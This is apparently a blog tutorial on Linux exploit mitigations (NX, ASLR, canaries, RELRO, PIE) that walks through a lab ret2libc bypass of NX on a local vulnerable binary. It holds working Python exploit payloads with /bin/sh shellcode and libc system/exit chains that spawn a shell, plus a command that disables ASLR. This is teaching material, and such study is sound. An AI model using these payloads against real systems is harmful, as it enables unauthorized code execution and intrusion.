2. Linux Exploit Countermeasures and Bypasses (2)

published: October 30, 2024
reading time: 15 minutes

To make exploitation more challenging, several mitigations have been developed and widely implemented. Let’s dive into some of the most popular ones and understand how they work:

1. DEP/NX (Data Execution Prevention / No eXecute):

Data Execution Prevention (DEP), also called No eXecute (NX), is a security feature that prevents code from running in non-executable memory regions like the stack or heap, blocking buffer overflow attacks that inject shellcode into these areas. The No-Execute (NX) bit, also known as Execute Disable (XD) in Intel terminology, is a hardware mechanism marking memory regions as non-executable, so code stored there cannot run. The NX bit was first introduced by AMD and later adopted by Intel as XD. It became widely implemented in operating systems starting with Windows XP SP2 and various Linux distributions. Most modern processors support this feature, allowing operating systems to enforce memory protections effectively.

How it Works: DEP/NX marks memory pages as either writable or executable, but never both. This means that even if an attacker injects malicious code into a writable region, it can’t be executed.

Example: Trying to execute shellcode from the stack with NX enabled will cause the program to crash, preventing exploitation.

2. ASLR (Address Space Layout Randomization):

Address Space Layout Randomization (ASLR) introduces randomness by shuffling the memory addresses of important regions, such as the stack, heap, and libraries, each time the program runs. This unpredictability makes it far harder for attackers to predict where their payload or code will end up.

How it Works: ASLR assigns a different memory address to regions of a process each time it’s loaded. This means an attacker can’t rely on specific memory addresses staying the same across runs.

Example: If an attacker tries to jump to a specific libc function by guessing its address, ASLR will frustrate these efforts by randomizing the location on each execution.

ASLR Configuration in Linux:

You can check and configure ASLR settings in Linux by interacting with the /proc/sys/kernel/randomize_va_space file. This file controls the level of randomization applied:

0: No randomization (static memory layout).
1: Conservative randomization (randomizes shared libraries, stack, heap, and mmap).
2: Full randomization (includes brk() management).

To enable full randomization, use:

echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

The following C program demonstrates ASLR’s effect by displaying addresses for a function, a local variable, and a dynamically allocated heap variable each time the program runs.

// gcc -m32 aslr.c -o aslr
// gcc -m32 aslr.c -o aslr
#include <stdio.h>
#include <stdlib.h>

void print_addresses();

int main() {
    int *heap_variable = (int *)malloc(sizeof(int)); // Allocate memory on the heap
    print_addresses(); // Print function and variable addresses
    printf("Address of heap variable: %p\n", (void *)heap_variable); // Print heap address
    free(heap_variable); // Free memory
    return 0;
}

void print_addresses() {
    int local_variable;
    printf("Address of main: %p\n", (void *)main);
    printf("Address of local variable: %p\n", (void *)&local_variable);
}

Run the program multiple times with ASLR enabled (set to 2):

$ ./aslr 
Address of main: 0x566451ad
Address of local variable: 0xffd29fac
Address of heap variable: 0x581761a0
$ ./aslr 
Address of main: 0x566221ad
Address of local variable: 0xffbcf99c
Address of heap variable: 0x5701b1a0
$ ./aslr 
Address of main: 0x566441ad
Address of local variable: 0xffb70fbc
Address of heap variable: 0x570f91a0

Notice how the addresses vary each time, making memory layout unpredictable.

Disabling ASLR: By setting /proc/sys/kernel/randomize_va_space to 0, ASLR is disabled, and addresses remain static across runs:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

$ ./aslr 
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr 
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0
$ ./aslr 
Address of main: 0x565561ad
Address of local variable: 0xffffd64c
Address of heap variable: 0x5655a1a0

With ASLR disabled, addresses stay constant on each run, removing the randomization layer, making it easier for attackers to predict addresses and exploit memory vulnerabilities.

It’s important to note that even with ASLR enabled, the offset for functions and gadgets within libc remains the same. This means that once we know the libc base address, we can determine the address of any libc function or gadget at runtime simply by adding the known offset to the base.

3. Stack Canaries

Stack canaries, also known as security cookies, are a protective mechanism used to defend against buffer overflow attacks. Stack canaries act as a safeguard against buffer overflow attacks by introducing a random value, referred to as a “canary,” onto the stack near the return address. This canary serves as a sentinel that monitors any unauthorized modifications to the stack area.

How it Works: During a function call, a random canary value is inserted between the buffer and the return address on the stack. Before returning from a function, the program checks the integrity of this canary value. If it finds that the canary has been altered, it suggests a potential buffer overflow attack, prompting the program to take defensive actions such as terminating execution or invoking additional security measures.

Types of Stack Canaries:

Terminator Canaries These contain common string terminators like \x00, \r, \n, and \xFF. They help prevent attacks involving string operations by stopping prematurely due to these terminators.
Random Canaries Generated randomly at runtime, typically drawn from /dev/urandom if available. This randomness makes it challenging for attackers to predict or manipulate the canary value.
Random XOR Canaries Combine random numbers with control data (like the frame pointer and return address) using XOR operations. This ensures even slight modifications to the canary will result in incorrect values, triggering immediate termination.

4. RELRO (Relocation Read-Only):

Relocation Read-Only (RELRO) is a security feature implemented in the GNU Linker to enhance the security of ELF (Executable and Linkable Format) binaries by protecting certain sections from being overwritten. This feature is particularly focused on safeguarding the Global Offset Table (GOT), which is crucial for dynamic linking and can be exploited in various attacks. RELRO stands for Relocation Read-Only. It primarily aims to prevent attackers from modifying the GOT, which holds addresses for dynamically linked functions. By making these sections read-only after relocation, RELRO mitigates risks associated with binary exploitation techniques, such as GOT overwrite attacks.

Types of RELRO There are two modes of RELRO:

Partial RELRO:
- This mode marks the non-Procedure Linkage Table (non-PLT) part of the GOT as read-only after relocation.
- The PLT remains writable, meaning that while it provides some protection, it does not fully safeguard against all types of attacks.
- Partial RELRO is often the default setting in many GCC-compiled binaries.
Full RELRO:
- In this mode, both the GOT and PLT are made read-only after relocation.
- This provides a higher level of security by preventing any modifications to these sections during runtime.
- Full RELRO can increase startup time since all dynamic symbols must be resolved before execution begins.

Implementation of RELRO:

$ # For Partial RELRO:
$ gcc -o file file.c -Wl,-z,relro
$ # For Full RELRO:
$ gcc -o file file.c -Wl,-z,relro,-z,now

Full RELRO provides stronger protection against GOT overwrite attacks compared to Partial RELRO. However, it can lead to longer startup times since all symbols must be resolved before execution.

We’ll dive deeper into this concept when we explore bypass techniques.

5. PIE (Position Independent Executables)

Position Independent Executables (PIE) randomize the location of the executable itself, adding another layer of unpredictability to binary loading. Unlike ASLR, which affects shared libraries, PIE applies to the binary’s main code, making it more challenging to predict code locations for return-oriented programming (ROP) attacks.

How it Works: PIE enables the entire binary to be relocated to different memory addresses each time it runs. This feature requires the binary to be compiled in a way that allows it to operate independently of a fixed memory location.

Example: If an attacker tries to jump to a specific function within the executable, PIE will have randomized its position, forcing them to dynamically resolve the new address.

To check which mitigations are enabled on a binary, you can use checksec from the pwntools suite:

$ pwn checksec exp2_nx
[*] '/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02/exp2_nx'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

From the output, we can observe:

NX: The stack is non-executable (NX enabled), blocking code execution in writable areas.
RELRO: Partial RELRO is enabled, providing limited protection for GOT entries.
Stack Canary: Not found, so the binary lacks buffer overflow protection for stack frames.
PIE: Position Independent Executable is disabled, meaning the executable loads at a fixed address.

1. Bypassing DEP/NX (Data Execution Prevention / No eXecute):

Now, let’s work on bypassing NX! We’ll attempt to execute the same shellcode from our jmp eax example.

📝 Note: Make sure ASLR is disabled before proceeding.

Compile the Binary with NX Enabled

$ gcc -m32 exp1.c -fno-stack-protector -no-pie -o exp2_nx

For this test, I’ve renamed exp1.py to exp2.py and updated it to point to our jmp eax gadget.

#!/usr/bin/python2
# exp2.py
import struct

offset = 62

libc_base = 0xf7d5f000
jmp_eax = 0x00024fe3

payload = "\x90"*10 # 10 NOPS
payload += "\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" # /bin/sh shellcode
payload += "A"*(offset-len(payload)) # padding
#payload += "BBBB" # EIP
payload += struct.pack("<I",libc_base+jmp_eax) # EIP

print(payload)

Now, let’s try to execute the exploit with NX enabled on exp2_nx:

$ ./exp2_nx  $(./exp2.py)
Segmentation fault (core dumped)

Let’s examine the core dump to see what happened:

$ gdb -core core 
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffd5ce in ?? ()
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 EAX  0xffffd5ce ◂— 0x90909090
 EBX  0x41414141 ('AAAA')
 ECX  0xffffd910 ◂— 0xf7d83f
 EDX  0xffffd60d ◂— 0xf7d83f
 EDI  0xf7ffcb60 ◂— 0
 ESI  0xffffd700 —▸ 0xffffd914 ◂— 'SHELL=/usr/bin/bash'
 EBP  0x41414141 ('AAAA')
 ESP  0xffffd610 —▸ 0xffffd800 ◂— 6
 EIP  0xffffd5ce ◂— 0x90909090
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
 ► 0xffffd5ce    nop    
   0xffffd5cf    nop    
   0xffffd5d0    nop    
   0xffffd5d1    nop    
...

🔍 Here, we can see that we successfully landed on the NOP sled, but because the shellcode is in a non-executable memory region (due to NX), it cannot be executed. 😞

This example demonstrates the effectiveness of NX by preventing code execution in non-executable memory regions. 🛡️

So, how can we bypass NX? 🤔 While we can’t execute injected shellcode directly due to the non-executable stack, we can still execute existing code within the binary or libraries. This approach is called Return-Oriented Programming (ROP).

With ROP, we construct a payload that leverages small “gadgets”—existing sequences of instructions ending in a ret—to piece together our own custom execution flow. Essentially, instead of injecting new code, we’re “reusing” code that’s already in memory to achieve our exploit goals.

In this example, let’s use a technique called Return-to-libc (ret2libc) to bypass NX.

Ret2libc is a simpler and more specific form of ROP where the attacker uses the existing functions in the C standard library (like system(), exit(), etc.) to perform actions, particularly when trying to execute a shell. When the stack is non-executable, shellcode injection won’t work. But instead of injecting our own code, we can reuse code that’s already loaded in memory—in this case, from the C library (libc), which includes functions like system() and string pointers like /bin/sh.

Here’s how ret2libc works:

Find libc functions: We locate the system() function and a pointer to /bin/sh within libc. By calling system("/bin/sh"), we can spawn a shell.
Modify the payload: Instead of shellcode, our payload will set up the stack to call system("/bin/sh"), effectively giving us shell access by reusing safe code already loaded.

Let’s implement this with our example exploit!

Find system() offset within libc:

$ nm -D /usr/lib32/libc.so.6 | grep -i system
000524c0 T __libc_system@@GLIBC_PRIVATE
00171b20 T svcerr_systemerr@GLIBC_2.0
000524c0 W system@@GLIBC_2.0

For more info on nm refer my blog.

The offset for the system function in libc is 0x524c0. We can verify this using GDB with the pwndbg extension.

$ gdb ./exp2_nx
pwndbg> b main
Breakpoint 1 at 0x804919f
pwndbg> run
pwndbg> xinfo system
Extended information for virtual address 0xf7db14c0:

  Containing mapping:
0xf7d82000 0xf7f0e000 r-xp   18c000  23000 /usr/lib32/libc.so.6

  Offset information:
         Mapped Area 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
         File (Base) 0xf7db14c0 = 0xf7d5f000 + 0x524c0
      File (Segment) 0xf7db14c0 = 0xf7d82000 + 0x2f4c0
         File (Disk) 0xf7db14c0 = /usr/lib32/libc.so.6 + 0x524c0

 Containing ELF sections:
               .text 0xf7db14c0 = 0xf7d821c0 + 0x2f300

xinfo command will provide extended information about the system function, showing details about its memory mapping.

From this output, we can see that the libc base address is 0xf7d5f000 and the offset for system is confirmed as 0x524c0. This information is crucial for constructing our exploit.

Now, next step is finding the offset of string "/bin/sh".

We can use strings utility for it:

$ strings -a -t x /usr/lib32/libc.so.6 | grep "/bin/sh"
 1c9e3c /bin/sh

So the offset for string “/bin/sh” in libc is 0x1c9e3c.

We can also use GDB (pwndbg) for it:

pwndbg> search "/bin/sh"
Searching for byte: b'/bin/sh'
libc.so.6       0xf7f28e3c '/bin/sh'

So the offset will be 0xf7f28e3c-0xf7d5f000=0x1c9e3c

To understand how function calls are made in x86 architecture and how to exploit them using the return-to-libc (ret2libc) technique, we need to break down a few concepts, particularly the call instruction and the function’s stack frame.

Function Call Mechanism

Call Instruction: When a function is called using the call instruction, the CPU performs the following steps:
- Pushes the return address (the address of the instruction following the call) onto the stack.
- Transfers control to the function by jumping to its address.
Transfers Control: The CPU jumps to the function’s address, effectively transferring control to that function.
Handles Function Arguments:

Arguments passed to the function are typically placed on the stack or in specific registers (depending on the calling convention).
For example, in the cdecl calling convention, arguments are pushed onto the stack in right-to-left order before the call instruction is executed.

For example:

call my_function

If my_function is located at address 0x08048400, the CPU will push the return address (say, 0x0804840A) onto the stack and jump to 0x08048400.

Argument Handling For instance, if my_function expects two integer arguments, you might see something like this:

push 2      ; Push the second argument onto the stack
push 1      ; Push the first argument onto the stack
call my_function

Practical Example: C Program 🖥️ I’ve used the following C program to explain it more practically:

#include <stdio.h>
void two_str(char *s1, char *s2) {
    printf("%s\n",s1);
    printf("%s\n",s2);
}

int main() {
    char *str1="hello";
    char *str2="world";
    two_str(str1,str2);
}

To see how function calls work, disassemble main:

pwndbg> disass main
Dump of assembler code for function main:
   0x0804919a <+0>:	lea    ecx,[esp+0x4]
   0x0804919e <+4>:	and    esp,0xfffffff0
   0x080491a1 <+7>:	push   DWORD PTR [ecx-0x4]
   0x080491a4 <+10>:	push   ebp
   0x080491a5 <+11>:	mov    ebp,esp
   0x080491a7 <+13>:	push   ecx
   0x080491a8 <+14>:	sub    esp,0x14
   0x080491ab <+17>:	call   0x80491e5 <__x86.get_pc_thunk.ax>
   0x080491b0 <+22>:	add    eax,0x2e44
   0x080491b5 <+27>:	lea    edx,[eax-0x1fec]
   0x080491bb <+33>:	mov    DWORD PTR [ebp-0xc],edx
   0x080491be <+36>:	lea    eax,[eax-0x1fe6]
   0x080491c4 <+42>:	mov    DWORD PTR [ebp-0x10],eax
   0x080491c7 <+45>:	sub    esp,0x8
   0x080491ca <+48>:	push   DWORD PTR [ebp-0x10]
   0x080491cd <+51>:	push   DWORD PTR [ebp-0xc]
   0x080491d0 <+54>:	call   0x8049166 <two_str>
   0x080491d5 <+59>:	add    esp,0x10
   0x080491d8 <+62>:	mov    eax,0x0
   0x080491dd <+67>:	mov    ecx,DWORD PTR [ebp-0x4]
   0x080491e0 <+70>:	leave
   0x080491e1 <+71>:	lea    esp,[ecx-0x4]
   0x080491e4 <+74>:	ret

At instructions +48 and +51, you can see that pointers to the strings are pushed onto the stack.

Let’s set a breakpoint at 0x080491d0 (i.e., *main + 54) and run the program:

pwndbg> b *0x080491d0
Breakpoint 1 at 0x80491d0
pwndbg> run

Now, let’s examine the stack right before we call two_str:

pwndbg> x/2wx $sp
0xffffd5d0:	0x0804a008	0x0804a00e
pwndbg> x/s 0x0804a008
0x804a008:	"hello"
pwndbg> x/s 0x0804a00e
0x804a00e:	"world"
pwndbg> stack 2
00:0000│ esp 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
01:0004│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'

You can see that the pointer to the string world is pushed before the pointer to the string hello.

Now, let’s continue to the function call:

pwndbg> b *0x8049166
Breakpoint 2 at 0x8049166
pwndbg> c

When we print the stack now, we see that the top of the stack points to the return address 0x080491d5 (i.e., *main+59):

pwndbg> stack 3
00:0000│ esp 0xffffd5cc —▸ 0x80491d5 (main+59) ◂— add esp, 0x10
01:0004│-028 0xffffd5d0 —▸ 0x804a008 ◂— 'hello'
02:0008│-024 0xffffd5d4 —▸ 0x804a00e ◂— 'world'
pwndbg> x/3wx $esp
0xffffd5cc:	0x080491d5	0x0804a008	0x0804a00e

I hope now you understood what happens when we call a function with arguments.

Now, following picture will clear your understanding on ret2libc

ret2libc

#!/usr/bin/python2
# exp3.py
import struct

offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c

payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh

print(payload)

For easy understanding I’ve used 0xdeadbeef as return address where we should land after executing system("/binsh").

./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02

As you can see we got shell :)

But let’s exit from the shell see what happens.

./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
Segmentation fault (core dumped)

As you can see we got segfault. Let’s examine the core dump.

$ gdb -core core
...
──────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────
 EAX  0
 EBX  0x41414141 ('AAAA')
 ECX  0xffffd2d4 ◂— 0
 EDX  0
 EDI  0xf7ffcb60 ◂— 0
 ESI  0xffffd6c0 —▸ 0xffffd8de ◂— 'SHELL=/usr/bin/bash'
 EBP  0x41414141 ('AAAA')
 ESP  0xffffd5d4 —▸ 0xf7f28e3c ◂— '/bin/sh'
 EIP  0xdeadbeef
────────────────────────────[ DISASM / i386 / set emulate on ]────────────────────────────
Invalid address 0xdeadbeef

...

As you can see we landed on invalid address.

For landing on safe address we will use exit() function.

$ nm -D /usr/lib32/libc.so.6 | grep exit
...
0003eac0 T exit@@GLIBC_2.0

We can verify this:

pwndbg> xinfo exit
Extended information for virtual address 0xf7d9dac0:

  Containing mapping:
0xf7d82000 0xf7f0e000 r-xp   18c000  23000 /usr/lib32/libc.so.6

  Offset information:
         Mapped Area 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
         File (Base) 0xf7d9dac0 = 0xf7d5f000 + 0x3eac0
      File (Segment) 0xf7d9dac0 = 0xf7d82000 + 0x1bac0
         File (Disk) 0xf7d9dac0 = /usr/lib32/libc.so.6 + 0x3eac0

 Containing ELF sections:
               .text 0xf7d9dac0 = 0xf7d821c0 + 0x1b900

Here’s our exploit to perform ret2libc:

#!/usr/bin/python2
# exp3.py
import struct

offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0

payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh

print(payload)

By replacing 0xdeadbeef with a valid exit function address, we ensure the process exits gracefully instead of crashing.😊

./exp2_nx $(./exp3.py)
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
0

In Linux, the command echo $? is used to print the exit status of the last executed command.

Extra Info:

What if we want the exit status to be 255?

To set the exit status to 255, which in hexadecimal is represented as 0xFF, we can add 0xff as an argument to exit() right after the pointer to the string "/bin/sh".

ret2libc

#!/usr/bin/python2
# exp3.py
import struct

offset = 62
libc_base = 0xf7d5f000
system = libc_base + 0x524c0
bin_sh = libc_base + 0x1c9e3c
exit_func = libc_base + 0x3eac0

payload = "A"*offset
payload += struct.pack("<I",system) # EIP -> system
# payload += struct.pack("<I",0xdeadbeef) # return address
payload += struct.pack("<I",exit_func) # return address
payload += struct.pack("<I",bin_sh) # arg -> /bin/sh
payload += struct.pack("<I",0xff) # exit status

print(payload)

./exp2_nx $(./exp3.py)
bash: warning: command substitution: ignored null byte in input
$ pwd
/home/kali/Desktop/Blogs/Materials/x86_exp_dev/02
$ exit
echo $?
255

This way, we can control the exit status directly through our payload.